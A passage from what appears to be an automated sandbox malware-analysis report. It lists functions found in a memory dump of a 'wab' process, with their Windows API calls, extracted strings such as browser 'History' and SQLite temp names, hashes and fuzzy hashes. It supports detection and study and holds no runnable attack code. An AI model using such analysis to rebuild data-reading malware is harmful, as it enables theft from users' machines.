                                                                                                                                                                                          • Opcode Fuzzy Hash: 6248b2b7f6a479c554c71b0c61ae383c8a643aca280bf9f33ef5fcf46466946d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                                                                                          • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: PathTemp$??3@
                                                                                                                                                                                          • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                                          • API String ID: 1589464350-1420421710
                                                                                                                                                                                          • Opcode ID: c8350a72466cbc4bd1e5c41b0b1d0b837946de2a99fd363d48ea7ac73f264160
                                                                                                                                                                                          • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                                                          • Opcode Fuzzy Hash: c8350a72466cbc4bd1e5c41b0b1d0b837946de2a99fd363d48ea7ac73f264160
                                                                                                                                                                                          • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040FDD5
                                                                                                                                                                                            • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                                                                                                                                                                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                                          • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                          • API String ID: 1775345501-2769808009
                                                                                                                                                                                          • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                                                          • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0041477F
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0041479A
                                                                                                                                                                                          • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                                                          • String ID: General
                                                                                                                                                                                          • API String ID: 999786162-26480598
                                                                                                                                                                                          • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                                          • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                                                          • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                                          • String ID: Error$Error %d: %s
                                                                                                                                                                                          • API String ID: 313946961-1552265934
                                                                                                                                                                                          • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                          • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                                                          • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                          • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                                                          • API String ID: 0-1953309616
                                                                                                                                                                                          • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                          • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                                                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                                                          • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                          • API String ID: 3510742995-272990098
                                                                                                                                                                                          • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                          • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                                                          • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                          • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                          • String ID: gj
                                                                                                                                                                                          • API String ID: 1297977491-4203073231
                                                                                                                                                                                          • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                          • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                                                          • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                                                                                                                                                                            • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                          • Opcode ID: 918fb40db202875b378d842bfaa161541e598b9eb5485fff4299785a3e50709c
                                                                                                                                                                                          • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 918fb40db202875b378d842bfaa161541e598b9eb5485fff4299785a3e50709c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                                                          • malloc.MSVCRT ref: 004174BD
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2903831945-0
                                                                                                                                                                                          • Opcode ID: 1f9670b26524ddcc1a9c49ebc2632eb8f83c4518f6bd06434b5022e15632c249
                                                                                                                                                                                          • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f9670b26524ddcc1a9c49ebc2632eb8f83c4518f6bd06434b5022e15632c249
                                                                                                                                                                                          • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4247780290-0
                                                                                                                                                                                          • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                          • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                                                                          • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                          • memset.MSVCRT ref: 004450CD
                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                                                                                                                            • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                                                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                                                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1471605966-0
                                                                                                                                                                                          • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                                                          • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                                                          • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                                                          • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                                                          • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                                                          • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                                            • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                                                                                                                            • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                                          • String ID: \StringFileInfo\
                                                                                                                                                                                          • API String ID: 102104167-2245444037
                                                                                                                                                                                          • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                                          • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                                                                          • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                                          • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                          • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                          • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040F508 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$??3@
                                                                                                                                                                                          • String ID: g4@
                                                                                                                                                                                          • API String ID: 3314356048-2133833424
                                                                                                                                                                                          • Opcode ID: 8c85e9c0546913db7efdbdbfe2a29cc801ada288f99a1e0c97a35953d22f6614
                                                                                                                                                                                          • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c85e9c0546913db7efdbdbfe2a29cc801ada288f99a1e0c97a35953d22f6614
                                                                                                                                                                                          • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _memicmpwcslen
                                                                                                                                                                                          • String ID: @@@@$History
                                                                                                                                                                                          • API String ID: 1872909662-685208920
                                                                                                                                                                                          • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                                                          • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                                                          • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 004100FB
                                                                                                                                                                                          • memset.MSVCRT ref: 00410112
                                                                                                                                                                                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                                          • String ID: </%s>
                                                                                                                                                                                          • API String ID: 3400436232-259020660
                                                                                                                                                                                          • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                                          • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                                                                          • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040D58D
                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                                                          • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                                          • String ID: caption
                                                                                                                                                                                          • API String ID: 1523050162-4135340389
                                                                                                                                                                                          • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                                          • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                                                                                          • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
